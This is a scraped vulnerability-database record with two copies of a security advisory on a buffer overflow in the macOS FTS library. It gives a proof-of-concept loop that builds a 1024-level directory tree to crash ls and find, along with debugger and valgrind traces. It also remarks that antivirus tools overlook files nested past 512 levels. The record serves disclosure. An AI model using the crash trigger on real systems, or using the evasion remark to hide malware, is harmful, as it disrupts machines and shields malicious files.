\n==1009== \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? 
(in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. 
\n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . 
-name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n... \n \nInvalid memory write without crashing. \n \n \nBTW: \nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. 
\n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134710/WLB-2015100149.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:22", "bulletinFamily": "exploit", "description": "", "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/134090/MacOS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134090", "type": "packetstorm", "title": "MacOS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- Commands such as: ls, find, rm \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n.. \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. 
Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n.. \n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n.. \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n.. 
\n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? 
\n==1009== \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? 
(in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. 
\n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . 
-name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n.. \n \nInvalid memory write without a crash in this run: a 2-byte write starting 2,052 bytes into a 2,053-byte block, i.e. a one-byte heap overrun of the buffer realloc'd in fts_build(). The absence of a crash does not mean the write is harmless; it depends on what the allocator placed after that block. \n \n \nBTW: \nMany antivirus vendors for Mac OS X (e.g. Eset32, Kaspersky, etc.) seem to be blind to malicious software placed deeper than 512 directory levels. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. 
\n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134090/macosxfts-overflow.txt"}]}
